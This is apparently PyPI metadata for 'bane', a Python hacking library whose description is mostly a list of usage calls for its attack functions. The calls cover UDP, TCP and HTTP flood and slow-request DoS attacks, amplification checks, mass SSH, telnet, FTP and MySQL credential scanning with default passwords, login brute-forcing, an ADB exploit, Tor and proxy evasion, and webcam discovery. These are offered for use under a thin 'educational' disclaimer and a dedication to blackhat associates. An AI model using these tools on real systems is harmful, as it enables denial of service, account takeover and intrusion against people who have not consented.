{
"info": {
"author": "AlaBouali",
"author_email": "trap.leader.123@gmail.com",
"bugtrack_url": null,
"classifiers": [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python"
],
"description": "\"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!\" -Bane (Dark Knight)\r\n\r\n\r\n\r\n .///` `.--::::::---.`` `///. \r\n h-.-s+++/--
.---/+o++s:.-h \r\n ++..-. `:../s \r\n -+ydm-..: :..-dmho:` \r\n :odmNNNNs..-. `:..+MNNNmmy/. `\r\n .odmNNNNMMMN`..: -..`mMMMMNNNNmy: \r\n +mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy. \r\n .yNNNNMMMMMMMMMd` `-
```````..-` `yMMMMMMMMMMNNNd: \r\n -dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo \r\n :mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs` \r\n /mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy` \r\n :mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy` \r\n -mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo \r\n hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm- \r\n -NNNNNMMMMMMMMMMMMMMMMMM-..: -
NMMMMMMMMMMMMMMMMMMNNNNs \r\n oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm \r\n :dNNNNNNMMMMMMMMMMMMMMMMMd
-``````
.hMMMMMMMMMMMMMMMMMMMNNNNNs. \r\n .ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `\r\n `oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `\r\n +y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N` \r\n m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `\r\n /d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m` \r\n h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/ \r\n m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so \r\n d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s \r\n .h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h \r\n -y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d \r\n :s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `\r\n /o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `\r\n ++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `\r\n -h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `\r\n s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y- \r\n .h `:`/hNMMMMMMd+: -::
s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y \r\n o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h. \r\n `d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s \r\n o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h. \r\n `d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s \r\n o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d. \r\n `d .:. -sy .. .o--+ -.+-.`.-/
:/
/--`.-+.: +--o- `/d+``--`:s \r\n s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h. \r\n .h -:`/.///`/..`:-.:`
.
`: /--../ //:o.:.-y \r\n s: -o/::/:--.-.-.: : /`:.---/::+. y- \r\n `h. ``/. `/ ` -.:```
..` ```: / ` :` ./. +o \r\n .y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s \r\n .y- -.:```: :/::o+/::/ : ``: : `+o \r\n `s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/ \r\n :s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o. \r\n `/o:+..+`.` -.://+
+--//:-+
////`: `../-.ss- \r\n /h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y- \r\n o+``.-+-.::
o//o- /--::--+ .o//s
:/.-//:``:s \r\n -o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o: \r\n -o++oy.: .- /`o::oo:-+-/ -- /o++++o: \r\n `os .. /..//../ ..` `s: \r\n `o+. `:`:-.-. `.++- \r\n `/+/.` `. .` `-++:` \r\n `:+++/:-
-:+++/- \r\n `.-::--` \r\n `\r\n\r\n\r\n\r\n---------------------------------------------------------------------------------------------------------------------------\r\n INTRODUCTION:\r\n---------------------------------------------------------------------------------------------------------------------------\r\n\r\nThis python library is made for educational purposes only. Me, as the creator and developer, not responsible for any misuse for this module in any malicious activity. It is made as a tool to understand how hackers can create their tools and perform their attacks. It contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing
) and even more ;)\r\n
The module can be used as a \"codebase\" for more sophisticated and advanced scanning tools to help securing websites !! I hope you guys use it wisely and carefully ;)\r\n\r\n---------------------------------------------------------------------------------------------------------------------------\r\n SPECIAL SPEECH:\r\n---------------------------------------------------------------------------------------------------------------------------\r\n\r\nThis is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in hacking world and groups as hacktivists, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:\r\n
-S0u1 ( https://twitter.com/YourAnonS0u1 ) : programmer and blackhat.\r\n
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.\r\n
-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.\r\n
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.\r\n
-Jen Hill.\r\n
in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)\r\n\r\nnow let's start some tutorials, shall we?\r\n\r\n---------------------------------------------------------------------------------------------------------------------------\r\n TUTORIALS:\r\n---------------------------------------------------------------------------------------------------------------------------\r\nI-INSTALLING THE LIBRARY AND IMPORTING:\r\n---------------------------------------------------------------------------------------------------------------------------\r\n\r\nyou can use pip to do that ( if you are on linux you must run it with \"sudo\" ) :\r\n\r\n\r\n\r\nor\r\n\r\n\r\n\r\n
or you can clone the project's link then run setup.py
\r\n\r\ngit clone https://github.com/AlaBouali/bane\r\n
cd bane\r\n
python setup.py install\r\n
To use it, you have to open the python interpreter from your terminal/cmd (bane can be used only inside the interpreter only after importing it):\r\n\r\n\r\nor\r\n\r\nthen import it and start using it as in the tutorials below:\r\n\r\n\r\n\r\n---------------------------------------------------------------------------------------------------------------------------\r\nII-Usage (General usage):\r\n---------------------------------------------------------------------------------------------------------------------------\r\n\r\n# Vulnerabilities TESTING:\r\n\r\nAutomatic XSS scan for page:
\r\n\r\nbane.xss_forms(link , payload=\"\" , timeout=15 )\r\n
SSTI:
\r\n\r\nbane.ssti_forms(link , timeout=15 )\r\n
Remote Command Execution Linux Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"command\":\"linux\"},based_on='time', timeout=15 )\r\nRemote Command Execution Linux File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"command\":\"linux\"},based_on='file', timeout=15 )\r\nRemote Command Execution Windows Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"command\":\"windows\"},based_on='time', timeout=15 )\r\nRemote Command Execution Windows File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"command\":\"windows\"},based_on='file', timeout=15 )\r\n\r\nRemote Code Execution PHP Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"php\"},based_on='time', timeout=15 )\r\nRemote Code Execution PHP File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"php\"},based_on='file', timeout=15 )\r\n\r\nRemote Code Execution PYTHON Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"python\"},based_on='time', timeout=15 )\r\nRemote Code Execution PYTHON File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"python\"},based_on='file', timeout=15 )\r\n\r\nRemote Code Execution PERL Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"perl\"},based_on='time', timeout=15 )\r\nRemote Code Execution PERL File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"perl\"},based_on='file', timeout=15 )\r\n\r\nRemote Code Execution RUBY Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"ruby\"},based_on='time', timeout=15 )\r\nRemote Code Execution RUBY File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"ruby\"},based_on='file', timeout=15 )\r\n\r\nRemote Code Execution NODEJS Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"nodejs\"},based_on='time', timeout=15 )\r\nRemote Code Execution NODEJS File-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"code\":\"nodejs\"},based_on='file', timeout=15 )\r\n\r\nSQL-Injection Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"sql\":\"mysql\"}, timeout=15 )#test for MySQL\r\nSQL-Injection Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"sql\":\"oracle\"}, timeout=15 )#test for Oracle\r\nSQL-Injection Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"sql\":\"postgre\"}, timeout=15 )#test for Postgre\r\nSQL-Injection Time-Based:
\r\n\r\nbane.rce_forms(link ,injection={\"sql\":\"sql_server\"}, timeout=15 )#test for SQL Server\r\n\r\n\r\nPath traversal:
\r\n\r\nbane.path_traversal_urls(link, timeout=15 )\r\n\r\n
SSRF:
\r\n\r\nbane.ssrf_urls(link )\r\n\r\n
CRLF header injection:
\r\n\r\nbane.crlf_header_injection(link, timeout=15 )\r\n\r\n\r\n
CRLF body injection:
\r\n\r\nbane.crlf_body_injection(link, timeout=15 )\r\n\r\n\r\n\r\n
Clickjacking:
\r\n\r\nbane.clickjacking(link, timeout=15 )\r\n\r\n
HTTP Strict Transport Security (HSTS):
\r\n\r\nbane.hsts(link, timeout=15 )\r\n\r\n
CORS Misconfigurations:
\r\n\r\nbane.cors_misconfigurations(link, timeout=15 )\r\n\r\n\r\n\r\n
CSRF:
\r\n\r\ncookie=\"session=fgyujikop\"#just an example of cookie sinceit requires a session\r\n
bane.csrf_forms(link, timeout=15 , cookie=cookie )\r\n\r\n\r\n
File upload:
\r\n\r\nbane.file_upload(link, timeout=15 )\r\n\r\n\r\n\r\n
Android Debug Bridge (ADB) exploit:
\r\n\r\nbane.adb_exploit(IP , timeout=5 )\r\n\r\n
Exposed unauthenticated Telnet server:
\r\n\r\nbane.exposed_telnet(IP , timeout=5 )\r\n\r\n
Exposed \"/.env\" File:
\r\n\r\nbane.exposed_env(link , timeout=15 )\r\n\r\n
Vulners API Search for known vulnerabilities on a particular software:
\r\n\r\nbane.vulners_search(\"wordpress\",version=\"4.7.4\")#just an example\r\n\r\n\r\n
PHPUNIT exploit:
\r\n\r\nbane.phpunit_exploit(link , timeout=15 )\r\n\r\n
Shodan report:
\r\napi_key=\"ghbjklmjklmjlkml....\"\r\n
bane.shodan_report(IP , api_key)\r\n
UDP FLOOD:
\r\n\r\nbane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)\r\n
TCP FLOOD:
\r\n\r\nbane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)\r\n
HTTP FLOOD:
\r\nbane.http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)\r\n
HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):
\r\n\r\nbane.prox_http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)\r\n
Torshammer attack:
\r\n\r\nbane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)\r\n
Torshammer attack but through proxies instead of Tor:
\r\n\r\nbane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)\r\n
R.U.D.Y attack:
\r\n\r\nbane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form=\"q\" , page=\"/search.php\")\r\n
Xerxes attack:
\r\n\r\nbane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )\r\n
Xerxes attack through proxies:
\r\n\r\nbane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )\r\n
Slow read attack:
\r\n\r\nbane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )\r\n
Users list:
\r\n\r\nbane.wp_users(link , timeout=15 )\r\n
User's details:
\r\n\r\nbane.wp_user(link , user=1 , timeout=15 )\r\n
All xmlrpc's available functions:
\r\n\r\nbane.wp_xmlrpc_methods(link , timeout=15 )\r\n
Check if it's possible to performe BruteForce attack through xmlrpc:
\r\n\r\nbane.wp_xmlrpc_bruteforce(link , timeout=15 )\r\n
Check if it's possible to performe Mass BruteForce attack through xmlrpc:
\r\n\r\nbane.wp_xmlrpc_mass_bruteforce(link , timeout=15 )\r\n
Check a Login Combo:
\r\n\r\nbane.wpadmin(link , username , password , timeout=15 )\r\n
Check Multiple Login Combo at once:
\r\n\r\nbane.wpadmin_mass(link , word_list=[\"admin:123\",\"admin:HGJJK\",\"admin:HJKL\",\"admin:%MLK\"] , timeout=15 )\r\n
Check if it's possible to performe PingBack attack through xmlrpc:
\r\n\r\nbane.wp_xmlrpc_pingback(link , timeout=15 )\r\n
Performe PingBack attack through xmlrpc:
\r\n\r\nbane.wp_xmlrpc_pingback(link , target_url=\"https://www.example.com\" , timeout=15 )\r\n
Check if it's possible to performe BruteForce attack through xmlrpc:
\r\n\r\nbane.wp_xmlrpc_bruteforce(link , timeout=15 )\r\n
Users Enumeration:
\r\n\r\nbane.wp_users_enumeration(link , timeout=15 )\r\n
WordPress version:
\r\n\r\nbane.wp_version(link , timeout=15 )\r\n
Vulnerable plugins and themes:
\r\n\r\nbane.wp_scan(link , timeout=15 )\r\n
Mass HTTP proxies gathering:
\r\n\r\nMass SOCKS4 proxies gathering:
\r\n\r\nMass SOCKS5 proxies gathering:
\r\n\r\nSome HTTP proxies gathering:
\r\n\r\nSome HTTPS proxies gathering:
\r\n\r\nSome SOCKS4 proxies gathering:
\r\n\r\nSome SOCKS5 proxies gathering:
\r\n\r\nChecking proxy:
\r\n\r\nbane.proxy_check(IP , port , proto=\"http\" , timeout=5)\r\n
Mass ssh scanning: (if you are on Windows OS, please install Putty)
\r\n\r\nbane.mass_scan(threads=100 , protocol=\"ssh\" , word_list= [\"root:root\",\"admin:admin\"] )\r\n
Mass telnet scanning:
\r\n\r\nbane.mass_scan(threads=100 , protocol=\"telnet\" , word_list= [\"root:root\",\"admin:admin\"] )\r\n
Mass ftp scanning:
\r\n\r\nbane.mass_scan(threads=100 , protocol=\"ftp\" , word_list= [\"root:root\",\"admin:admin\"] )\r\n
Mass MySQL scanning:
\r\nbane.mass_scan(threads=100 , protocol=\"mysql\" , word_list= [\"root:root\",\"admin:admin\"] )\r\n
Mass Android Debug Bridge (ADB) exploit:
\r\n\r\nbane.mass_scan(threads=100 , protocol=\"adb\" )\r\n
Parse all forms in the page:
\r\n\r\nbane.forms_parser(link , timeout=10 )\r\n
Get all page inputs and their values:
\r\n\r\nbane.inputs(link , value=True , timeout=10 )\r\n
Get all page forms and their values:
\r\n\r\nbane.forms(link , value=True , timeout=10 )\r\n
Get login form:
\r\n\r\nbane.loginform(link , value=True , timeout=10 )\r\n
Get all links on the page:
\r\n\r\nbane.crawl(link , timeout=10 )\r\n
Get all paths on the page:
\r\n\r\nbane.pather(link , timeout=10 )\r\n
Get all social media and external links on the page:
\r\n\r\nbane.media(link , timeout=10 )\r\n
Get all subdomains links on the page:
\r\n\r\nbane.subdomains_extract(link , timeout=10 )\r\n
Get banner:
\r\n\r\nbane.get_banner(IP , p=port , payload=None , timeout=5 )\r\n
Get infomation about Domain or IP:
\r\n\r\nbane.info(IP , timeout=15 )\r\n
safeweb.norton.com report for a link:
\r\n\r\nbane.norton_rate(link , timeout=15 )\r\n
Your IP address:
\r\n\r\nWHOIS:
\r\n\r\nGEO-Information for any IP:
\r\n\r\nHTTP headers:
\r\n\r\nReverse IP Lookup:
\r\n\r\nbane.reverse_ip_lookup( IP )\r\n
Resolve any domain using a specific DNS server:
\r\n\r\nbane.resolve( domain , server=\"8.8.8.8\" )\r\n
Very Fast port scan:
\r\n\r\nbane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result\r\n
Subdomains finder:
\r\n\r\nbane.subdomains_finder( domain )\r\n\r\n
XOR:
\r\n\r\nbane.xor_string( data, key )\r\n
Caesar:
\r\n\r\nbane.caesar_string( data, key )\r\n
MD5:
\r\n\r\nbane.md5_string( data )\r\n
SHA1:
\r\n\r\nbane.sha1_string( data )\r\n
SHA224:
\r\n\r\nbane.sha224_string( data )\r\n
SHA256:
\r\n\r\nbane.sha256_string( data )\r\n
SHA384:
\r\n\r\nbane.sha384_string( data )\r\n
SHA512:
\r\n\r\nbane.sha512_string( data )\r\n
Base64 encoding:
\r\n\r\nbane.base64_encode( data )\r\n
Base64 decoding:
\r\n\r\nbane.base64_decode( data )\r\n
File content encryption with XOR:
\r\n\r\nbane.xor_file( file , key )\r\n
File content encryption with MD5:
\r\n\r\nbane.md5_file( file )\r\n
File content encryption with SHA1:
\r\n\r\nbane.sha1_file( file )\r\n
File content encryption with SHA224:
\r\n\r\nbane.sha224_file( file )\r\n
File content encryption with SHA256:
\r\n\r\nbane.sha256_file( file )\r\n
File content encryption with SHA384:
\r\n\r\nbane.sha384_file( file )\r\n
File content encryption with SHA512:
\r\n\r\nbane.sha512_file( file )\r\n
File content encoding with base64:
\r\n\r\nbane.base64_encode_file( file )\r\n
File content decoding with base64:
\r\n\r\nbane.base64_decode_file( file )\r\n
MD5:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , md5_hash=True )\r\n
SHA1:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , sha1_hash=True )\r\n
SHA224:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , sha224_hash=True )\r\n
SHA256:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , sha256_hash=True )\r\n
SHA384:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , sha384_hash=True )\r\n
SHA512:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , sha512_hash=True )\r\n
Base64:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , base64_string=True )\r\n
Caesar:
\r\n\r\nbane.decrypt(hash , word_list=[\"admin\",\"admin123\",\"love\"] , caesar_hash=True )\r\n
Admin login form on web page:
\r\n\r\nbane.web_login_bruteforce(link , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=15 )\r\n
Bruteforce HTTP authentication login:
\r\n\r\nbane.http_auth_bruteforce(link , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=15 )\r\n
FTP server:
\r\n\r\nbane.hydra(IP , protocol=\"ftp\" , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=5 )\r\n
SSH server: (if you are on windows, please install Putty)
\r\n\r\nbane.hydra(IP , p=22 , protocol=\"ssh\" , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=5 )\r\n
TELNET server:
\r\n\r\nbane.hydra(IP , p=23 , protocol=\"telnet\" , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=5 )\r\n
SMTP server:
\r\n\r\nbane.hydra(IP , p=25 , protocol=\"smtp\" , ehlo=False , helo=True , ttls=False , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=5)\r\n
MySQL server:
\r\n\r\nbane.hydra(IP , p=3306 , protocol=\"mysqlt\" , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=5 )\r\n
WordPress login page:
\r\n\r\nbane.hydra(link , protocol=\"wp\" , word_list=[\"admin:admin\",\"admin:1234\"] , timeout=15 )\r\n
Admin panel finder:
\r\n\r\nbane.admin_panel_finder(link , ext=\"php\" , timeout=15 )\r\n
Force browsing pages on admin panel:
\r\n\r\nbane.force_browsing(link , ext=\"php\" , timeout=15 )\r\n
Filemanager finder:
\r\n\r\nbane.filemanager_finder(link , ext=\"php\" , timeout=15 )\r\n
DNS:
\r\n\r\nbane.dns_factor( IP , timeout=3 )\r\n
NTP:
\r\n\r\nbane.ntp_factor( IP , timeout=3 )\r\n
Memcache:
\r\n\r\nbane.memcache_factor( IP , timeout=3 )\r\n
Chargen:
\r\n\r\nbane.chargen_factor( IP , timeout=3 )\r\n
SSDP:
\r\n\r\nbane.ssdp_factor( IP , timeout=3 )\r\n
SNMP:
\r\n\r\nbane.snmp_factor( IP , timeout=3 )\r\n
ECHO:
\r\n\r\nbane.echo_factor( IP , timeout=3 )\r\n
Without password: (doesn't work with Windows OS)
\r\n\r\nbane.tor_switch_no_password( interval=30 , logs=True )\r\n
Without password: (doesn't work with Windows OS)
\r\n\r\nbane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)\r\n
bane.update(version=None)\r\n
Clear a file:
\r\n\r\nbane.clear_file( file )\r\n
Create a file:
\r\n\r\nbane.create_file( file )\r\n
Delete a file:
\r\n\r\nbane.delete_file( file )\r\n
Get content of a file:
\r\n\r\nbane.read_file( file )\r\n
Get CloudFlare cookie: (you must install NodeJS first)
\r\n\r\nbane.get_cf_cookie( domain , user_agent )\r\n
Get HTB invitation:
\r\n\r\nbane.HTB_invitation()\r\n
Get Facebook account's ID:
\r\n\r\nbane.facebook_id( fb_link )\r\n
Google dorking:
\r\n\r\nbane.google_dorking( dork )\r\n
Webhint report's link:
\r\n\r\nbane.webhint_report( link )\r\n
Youtube search:
\r\n\r\nbane.youtube_search( query )\r\n
Write to a file:
\r\n\r\nbane.write_file( data , file )\r\n
Find webcams:
\r\n\r\nbane.webcams( count=10 , by={'country':'us'} )\r\nbane.webcams( count=10 , by={'type':'axis'} )\r\nbane.webcams( count=10 , by={'city':'paris'} )\r\nbane.webcams( count=10 , by={'timezone':'+00:00'} )\r\n